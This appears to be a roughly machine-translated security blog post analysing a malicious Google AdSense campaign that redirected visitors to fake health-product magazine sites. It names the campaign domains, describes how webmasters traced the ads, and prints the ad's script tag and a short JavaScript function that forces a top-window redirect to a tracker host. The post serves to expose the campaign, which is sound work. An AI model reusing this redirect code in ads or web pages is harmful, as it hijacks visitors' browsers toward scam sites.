In-Depth Investigation: When Google AdSense ads are maliciously exploited

In-Depth Investigation: When Google AdSense ads are maliciously exploited

Security researchers recently noticed that a large number of websites were inexplicably redirected to a specific website. After investigation, the culprit was Google AdSense ).

Last weekend, we noticed that a large number of webmaster websites were directed to a "magazine website". Some users were randomly redirected when they clicked a link or loaded a new webpage. All of these users said that opening a webpage would display a one or two seconds and then jump.

We performed security checks on these websites, but we did not find any problems on the website server. From the symptoms of these affected websites-first load the webpage, and then jump a few seconds, it indicates that these are browser client redirection. Either JavaScript or Meta-Refresh tags.

However, we did not find anything on the website that could modify the HTML or JavaScript of the webpage, so redirection should be caused by a third-party script.

What happened to Google AD Alliance

Malicious advertising is a troublesome problem. These advertisements are hard to trace. Because advertisements are targeted (advertisers place different advertisements based on their geographical locations, whether users use mobile phones or computers, 3G or Wi-Fi, and user browsing records ), therefore, different users will see different advertisements and their active time varies.

In addition, AD scripts often load content from multiple other websites. For example, the home page of a website we recently visited contains eight different third-party scripts (including ads and Web plug-ins)-When a browser loads a website, the web page will send thousands of HTTP requests to resources on 249 other domain names. This may be an extreme example, but it is still quite normal for AD scripts to send requests to 30-40 domain names.

However, we still have to find out the specific problem.

If you search for URLs of malicious advertisements, you will find a lot of posts discussing these redirection.

Search for this redirection address (lemode-mgz. com) can get a lot of results, in a lot of posts and blogs, we found this Google AdSense help forum post, there are more than 150 pieces of information in the post, record the features and sources of redirection.

This type of malicious redirection even appears in the ad viewing center of the Google AdSense console. These problems began to last for a month in the second half of December 2014, but they began to spread widely in January 9, 2015.

Tracking malicious ads

Websites with AdSense ads (non-text ads) randomly direct visitors to fake websites that reveal health secrets, such: skin maintenance, anti-aging, intelligence enhancement, and weight loss products. These fake websites may disguise themselves as well-known (often fictitious) blogs and magazines, such as Forbes, fashion manager, Doctor, and Mommy health. They seem to have stars making advertisements, making major scientific research headlines, and many others comment that these products are very effective.

All these fake websites are under different subdomains of lemode-mgz. com, consumernews247. com, and wan-tracker. com. All links direct to track. securevoluum. com/click. However, if you directly access these websites, you will not be able to see anything. There are only blank pages.

Domain names were registered about a month ago:

Lemode-mgz. com-created on 2014-12-14securevoluum. com-created on 2014-12-15wan-tracker. com-created on 2014-12-14consumernews247. com-created on and updated on track. securevoluum. com is hfrov. voluumtrk. and voluumtrk.com is created in 2014-08-06.

 

Whois information of these websites is protected, and domain names are hosted on Amazon EC2 and S3.

Find Source

Google didn't solve the problem in time, and the webmasters couldn't sit down, and they started to work together to solve the problem. In the process of solving the problem, they found that there was also a redirection phenomenon in the "ad viewing Center" on the Google AdSense official website. As shown in the video, webmasters are redirected when they see malicious ads in the ad View Center.

If the webmaster clicks the "back" button in the browser, they will return to the page containing malicious advertisements. However, they must be fast enough to capture a picture before being redirected again.

It is not enough to simply launch a webpage containing malicious advertisements, because the webpage still contains many advertisements from different advertisers. Therefore, the next step is to crop images and take a single advertisement to the ad display center for filtering (similar to Google image search, which uses the photos you provide to search for those advertisements ). If the filtered advertisement is redirected, the advertisement should be malicious.

Determine the hijacking Method

In this way, the webmasters finally found these malicious advertisements.

The adv-2646721236434373 of the anonymous advertiser, which redirects to adwynn. com. There is also Blackburn ART, which directs to rgeoffreyblackburn. com.

Both accounts use regular AdWords accounts, and the advertisement looks quite normal. In my opinion, what methods does a scammers hijack them? They may have stolen their usernames and passwords.

Another possibility is that scammers create these accounts and disguise them as regular websites. To investigate the truth, I tried to send an email to the registrant of the adwynn.com domain name, but they did not reply to me. Until January 13, I found that Google still did not block these two accounts, but their ads were no longer redirected. It should be able to Indirectly prove that both accounts are normal accounts.

Malicious redirection code

Someone did an in-depth investigation to find out how malicious advertisement redirection works:

I think I found the source code of the redirection link. I checked the adwynne.com advertisement code.

This is the script element in the advertisement:

<script src="hxxps://adwynne728us. wan-tracker .com/track-imp/g/bs01/adwynne728us/track.php?it=1420998670014&refurl=https%3A%2F%2Fwww.google.com%2Fadsense%2Fapp%3Fhl%3Den%26subid%3D...skipped...">

This script loads the link of adwynne728us. wan-tracker. com. The link content is:

function trackImp() { window.top.location.href = 'hxxp://track .securevoluum .com/421c6fa2-56dc-4806-b48a-6b536e9f021f?account=adwynne&campaign=us&adgroup=1&banner=728-90⁢=1420998670014&refurl=https%3A%2F%2Fwww.google.com%2Fadsense%2Fapp%3Fhl%3Den%26subid%3D....skipped...'; } trackImp();

This trackImp () function will load a link to track. securevolumm. com and redirect to this point:

hxxp://lemode-mgz .com/sc/10056/special-report.html?voluumdata=vid..00000006-a37f-49df-8000-000000000000__vpid..4728a800-99b3-11e4-8482-3005c6fcc558__caid..421c6fa2-56dc-4806-b48a-6b536e9f021f__lid...skipped...

Why does Google acquiesce in malicious code?

I'm curious about why Google acquiesce to these advertisers using malicious code, such as unauthorized redirection.

In fact, these advertisements do not have any malicious behavior in the Google review stage, but once they pass, they start to behave improperly. I think these third-party scripts should be controlled in any case. The script can work with the browser exploit to attack the visitor. If Google does not control the scripts in these advertisements, AdSense may eventually become the largest malicious advertising platform.

These malicious advertisements can also be used to attack Google Adsense users that have logged on. Hackers can try to construct CSRF and XSS attacks to attack users logging on to Google accounts.